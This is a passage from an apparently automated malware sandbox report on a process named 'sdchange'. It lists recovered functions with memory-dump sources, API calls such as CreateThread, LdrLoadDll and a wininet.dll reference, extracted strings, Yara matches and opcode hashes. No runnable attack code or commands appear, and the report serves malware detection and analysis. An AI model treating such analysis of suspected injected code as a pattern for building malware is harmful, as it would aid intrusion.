Opcode Fuzzy Hash: 1f97e7dfcb22a3bc6c53eeeaaa5f28ed75f17e3437f6e437eb72f302a4e552b5
Instruction Fuzzy Hash: 3990023220181442F1007598A44864A00159BE1301F95E011A5024599EC66589916131

Function 04FF2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2C7A

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9374a6205506d1c91a5645a767d10c4bcd3ae123a320f268fa8ef9300fb64e07
Instruction ID: 83a5eafce7708388daf0c2c6bbaa0ce2d482bf4be5c48459603b60359ad8e8c6
Opcode Fuzzy Hash: 9374a6205506d1c91a5645a767d10c4bcd3ae123a320f268fa8ef9300fb64e07
Instruction Fuzzy Hash: 0B90023220189842F1107158D44474E00159BD1301F99D411A442469CD869589917121

Function 04FF2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2C6A

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c9b9e8f157750d4b13b054ac61103dc4796dbc62b42f6be887c677fcdd3dae3c
Instruction ID: d9c1a2e0f584407e467b8e923252b7336917e50ccfc154f757d57355b7191f53
Opcode Fuzzy Hash: c9b9e8f157750d4b13b054ac61103dc4796dbc62b42f6be887c677fcdd3dae3c
Instruction Fuzzy Hash: 3B90023220181882F10071589444B4A00159BE1301F95D016A0124698D8615C9517521

Function 04FF2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2DFA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4e4a7eed343a1b6a1bbf3f6e0222b2242ddefb5dcf109bf0406937e37eeb4cc
Instruction ID: 10e44102a3d38ea7fc7baad02e79c24c05caba54c0eaba6abcc8df56e4086e24
Opcode Fuzzy Hash: b4e4a7eed343a1b6a1bbf3f6e0222b2242ddefb5dcf109bf0406937e37eeb4cc
Instruction Fuzzy Hash: 0790023220181453F1117158954470B00199BD1241FD5D412A042459CD96568A52A121

Function 04FF2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2DDA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c3feb96809d05b751c81da67d1470d7d67fde86912a5df931078421692baf74
Instruction ID: 4e1cc6dac5112e681ee6a20ad40484a07e582526583191d8f162691484dcdbc9
Opcode Fuzzy Hash: 3c3feb96809d05b751c81da67d1470d7d67fde86912a5df931078421692baf74
Instruction Fuzzy Hash: F4900222242851927545B158944450B4016ABE1241BD5D012A1414994C85269956D621

Function 04FF2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2D3A

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8438cee6d11d942743067d31047586381f7f2c3c7efd85592e1f5f8e1f1209ad
Instruction ID: 956e21bc8e1e2148ab87b622068e724ef16653c7926da7c0aa524d0e56d8a653
Opcode Fuzzy Hash: 8438cee6d11d942743067d31047586381f7f2c3c7efd85592e1f5f8e1f1209ad
Instruction Fuzzy Hash: 1190022230181043F1407158A45860A4015EBE2301F95E011E0414598CD91589565222

Function 04FF2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2D1A

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1786434af75cf4b2dc1e5778325332ace4bf8841550fa53210875f35cc027750
Instruction ID: 089e0bf1369fa9e4d64aaa4510a42ef76f26d718f3f66afd40cb64ff711d2c50
Opcode Fuzzy Hash: 1786434af75cf4b2dc1e5778325332ace4bf8841550fa53210875f35cc027750
Instruction Fuzzy Hash: E690022A21381042F1807158A44860E00159BD2202FD5E415A001559CCC91589695321

Function 04FF2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2EEA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 469e659bb78f8507b69dc56197f4a52dfaa36cf9650935512e1887771d3335b9
Instruction ID: 7e7b6ce06053ac7729d97ccb2fc06c9052ed2e9b47f008643ddfb741ea4e7387
Opcode Fuzzy Hash: 469e659bb78f8507b69dc56197f4a52dfaa36cf9650935512e1887771d3335b9
Instruction Fuzzy Hash: BC900262201C1443F1407558984460B00159BD1302F95D011A2064599E8A298D516135

Function 04FF2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2E8A

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0e0f49fed1238758823d29fb1bd7c72a22bd8ea8c2c34d073fc4ec852deda997
Instruction ID: 7ad31666a581010b33a880b2d3a96f7a7a9451b424da9cf304e594ea03355232
Opcode Fuzzy Hash: 0e0f49fed1238758823d29fb1bd7c72a22bd8ea8c2c34d073fc4ec852deda997
Instruction Fuzzy Hash: 0F90022260181542F1017158944461A001A9BD1241FD5D022A1024599ECA258A92A131

Function 04FF2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2FEA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ca9a297014310445802e2820d17edb86fee5fa936f95e08bc9f94c7b135dc6c7
Instruction ID: 428e8d64c32dd9d38d932e16dcb5a90afcc906395fd8b012459c4fa8e24e5174
Opcode Fuzzy Hash: ca9a297014310445802e2820d17edb86fee5fa936f95e08bc9f94c7b135dc6c7
Instruction Fuzzy Hash: AF900222211C1082F20075689C54B0B00159BD1303F95D115A0154598CC91589615521

Function 04FF2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2FBA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03fd44fb2bbac110cd24828708de0db07b0736df69addaa47e5076ca7578697a
Instruction ID: 1548a99a58906da3b6ce35087cae230bbec200d76d3e85604bcef4f0b037d9ff
Opcode Fuzzy Hash: 03fd44fb2bbac110cd24828708de0db07b0736df69addaa47e5076ca7578697a
Instruction Fuzzy Hash: E09002226018108261407168D88490A4015BFE2211B95D121A0998594D855989655665

Function 04FF2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2F3A

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 732f45c3acdd82725949f892847677b7a69ff5b28eac5911a452beb716a2e2c9
Instruction ID: 6b1faec685d8bebe046083da63727efd34d90ba0a7f3c953a6d25c8258bfb4a5
Opcode Fuzzy Hash: 732f45c3acdd82725949f892847677b7a69ff5b28eac5911a452beb716a2e2c9
Instruction Fuzzy Hash: 1690026234181482F10071589454B0A0015DBE2301F95D015E1064598D8619CD526126

Function 04FF2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2AFA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6d42d286eb0a85b21172e7e9de51271ca863d7d801c77074568213d8a4b05e5
Instruction ID: fad19bca6dec2e17387269ed92c777227aeb2c6f3c085ee02e87965583cfc040
Opcode Fuzzy Hash: d6d42d286eb0a85b21172e7e9de51271ca863d7d801c77074568213d8a4b05e5
Instruction Fuzzy Hash: C6900226221810422145B558564450F0455ABD73517D5D015F14165D4CC62189655321

Function 04FF2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2ADA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4cfdaec70c6fda7fbe952012ee6201df6acf5de782ab8cda6dfaee5370222bba
Instruction ID: b70e43aae69bbcc5f81b318b017723d6932cd0ca1d8ee1077feaa662f9814878
Opcode Fuzzy Hash: 4cfdaec70c6fda7fbe952012ee6201df6acf5de782ab8cda6dfaee5370222bba
Instruction Fuzzy Hash: A3900226211810432105B558574450B00569BD6351795D021F1015594CD62189615121

Function 04FF2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2BFA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de2b6ff1bae511cbfbed18111f4588b4380c7f18108ffae221b40037b5568235
Instruction ID: 7535baeed967313831659a2f11bb065ed2b4fccfbf9f6e2aa84dffaf5edb4442
Opcode Fuzzy Hash: de2b6ff1bae511cbfbed18111f4588b4380c7f18108ffae221b40037b5568235
Instruction Fuzzy Hash: BB90023220181842F1807158944464E00159BD2301FD5D015A0025698DCA158B5977A1

Function 04FF2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2BEA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf828191af1e82f0ec33319202ed4f0afaf0bd51f4bc1ead8923bf583b501f7b
Instruction ID: e05a1043a510a3d89214f0c97df32a35e759b33bcb58e5b956f543220f9376f9
Opcode Fuzzy Hash: cf828191af1e82f0ec33319202ed4f0afaf0bd51f4bc1ead8923bf583b501f7b
Instruction Fuzzy Hash: FA90023220585882F14071589444A4A00259BD1305F95D011A00646D8D96258E55B661

Function 04FF2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2BAA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ecf7861cb142c9c661c1e0673cec00c9f83a4b5754b312b6ca32b13469a9109a
Instruction ID: 116fc227f2f167e92a026d467de72bedfa29625bcebe3cb59099182277b78fe1
Opcode Fuzzy Hash: ecf7861cb142c9c661c1e0673cec00c9f83a4b5754b312b6ca32b13469a9109a
Instruction Fuzzy Hash: B690023260581842F1507158945474A00159BD1301F95D011A0024698D87558B5576A1

Function 04FF2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2B6A

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d1430cbda6f6e73a1c0194be0292f869f90bad668933ca230d851c8d750fe860
Instruction ID: 4d35a5ff24f44a40b02e128725167e93fdc68e73d8d8ec6677b6c7e1c289e994
Opcode Fuzzy Hash: d1430cbda6f6e73a1c0194be0292f869f90bad668933ca230d851c8d750fe860
Instruction Fuzzy Hash: E79002622028104361057158945461A401A9BE1201F95D021E10145D4DC52589916125

Function 04FF35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF35CA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e42806159b721dbd439230afcc415d7440152868edce9026bba3d9c177de711
Instruction ID: 41d9ee62834b9cd29c41d93c4090af594e13f18626d25783be9b3b44ab2dad6b
Opcode Fuzzy Hash: 7e42806159b721dbd439230afcc415d7440152868edce9026bba3d9c177de711
Instruction Fuzzy Hash: 7090023260591442F1007158955470A10159BD1201FA5D411A04245ACD87958A5165A2

Function 04FF39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF39BA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 48d75ef67bb6081fab64c30a492b0973f0dc5a01e456e9e2a1da72768a2ebb82
Instruction ID: 33b3a6f205349a69b2c8a1c318b7caf45ed51fabff62261a3fea847ec9752cc6
Opcode Fuzzy Hash: 48d75ef67bb6081fab64c30a492b0973f0dc5a01e456e9e2a1da72768a2ebb82
Instruction Fuzzy Hash: D590022224586142F150715C944461A4015BBE1201F95D021A08145D8D855589556221

Function 052DF9B4 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2886136469.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52d0000_sdchange.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47f33bccae8d6bd696f568f23823febc77db89f00c76d9ae45e22dbde362bb31
Instruction ID: a27c8d96d6ab1e76c5e7f510948019ac8120075733a70615a981eef7abaf2da3
Opcode Fuzzy Hash: 47f33bccae8d6bd696f568f23823febc77db89f00c76d9ae45e22dbde362bb31
Instruction Fuzzy Hash: C0D0955207D045CFC201ED78CD9658B33559353020316A7FC4072CB3D3D511C00701E9

Function 030B9EE7 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030B9ED2

Strings

n, xrefs: 030BA01F
jG, xrefs: 030BA175
z^, xrefs: 030BA04D
4$, xrefs: 030BA14D
<;, xrefs: 030BA03D
4, xrefs: 030BA029
P, xrefs: 030BA0A8
<m, xrefs: 030B9FCB
jB, xrefs: 030BA0D0
u, xrefs: 030BA1E6
d, xrefs: 030BA00B
e$, xrefs: 030BA143
NI, xrefs: 030B9FC1
xs, xrefs: 030B9F8B
#, xrefs: 030B9FF7
l, xrefs: 030BA0E3
SK, xrefs: 030BA11F
Y, xrefs: 030BA0B2
~, xrefs: 030B9F67
&J, xrefs: 030B9F14
N=, xrefs: 030BA1B4
4, xrefs: 030BA0BC
c>, xrefs: 030BA228

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: #$&J$4$4$4$$<;$<m$N=$NI$P$SK$Y$c>$d$e$$jB$jG$l$n$u$xs$z^$~
API String ID: 2422867632-2792551584
Opcode ID: 3596986e2661773b01e24a489eed8831cb64a03b2a406b41ec6d5a4d05ccb573
Instruction ID: 5d7a918d5cb0992d70d32f253803be9ea4fd944976edf66bb5a10143111f6483
Opcode Fuzzy Hash: 3596986e2661773b01e24a489eed8831cb64a03b2a406b41ec6d5a4d05ccb573
Instruction Fuzzy Hash: C68139B0D05269CBEB60CF85C9987DEBBB1BB45308F1081D9D1587B381C7BA1A89CF95

Function 030CF8B9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 030CF8D7
CoUninitialize.COMBASE ref: 030CF9BE

Strings

@J7<, xrefs: 030CF8EB

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 34c8baee2a77d5ea7277947764e9e7f664c9addba69075f4f2ba6d5eebf112fe
Instruction ID: a8a7a0405072c33cf74ff3d76a9fa9b74bc2f0ea9966809a8f94343516f71563
Opcode Fuzzy Hash: 34c8baee2a77d5ea7277947764e9e7f664c9addba69075f4f2ba6d5eebf112fe
Instruction Fuzzy Hash: EB316376A1020AAFCF10DFD8D8809EEB7B9FF88304B104559E505EB214D771EE05CBA1

Function 030CF8C0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 030CF8D7
CoUninitialize.COMBASE ref: 030CF9BE

Strings

@J7<, xrefs: 030CF8EB

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 7d36fbb95e53387b192735bf30c1f40eb6bae60a8a5c384f12efbb0877c14a83
Instruction ID: 32487567572631ed6b79ddc0fa92149e8fc7a81c312e4cee4585b68325554451
Opcode Fuzzy Hash: 7d36fbb95e53387b192735bf30c1f40eb6bae60a8a5c384f12efbb0877c14a83
Instruction Fuzzy Hash: C2314FB6A1030AAFDF00DFD8D8809EEB7B9FF88304B108559E505EB214D771EE058BA1

Function 030D3E70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 030D3F3B

Strings

wininet.dll, xrefs: 030D3EDB, 030D3EE4

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: wininet.dll
API String ID: 3472027048-3354682871
Opcode ID: 0a1b245ab2a77c5c43039cb045aa5c14517df60e9988c556fb0b7b6bdfd1659c
Instruction ID: 6b79d9984bdeddeffbaac0517893d96af86c6965574a507afad16344ca870c71
Opcode Fuzzy Hash: 0a1b245ab2a77c5c43039cb045aa5c14517df60e9988c556fb0b7b6bdfd1659c
Instruction Fuzzy Hash: 74317EB5A01309BBD714DF64C884FEBBBF8FB88710F14855DE9496B280D774AA40CBA5

Function 030C48D0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030C4942

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 18d9689ef8b136b2521bd402d68eb4271b622a9e13267d14b467ee2ee30fe7b6
Instruction ID: 4c6d2f0cb33a5e3842de5063f8614f927aa5b7a91f74398589d9f17e1627cf66
Opcode Fuzzy Hash: 18d9689ef8b136b2521bd402d68eb4271b622a9e13267d14b467ee2ee30fe7b6
Instruction Fuzzy Hash: 3B011EB9E5134DABEF10DBE5DC41FDDB7B8AB44208F044195E9089B240F631E758CB91

Function 030D9CA0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

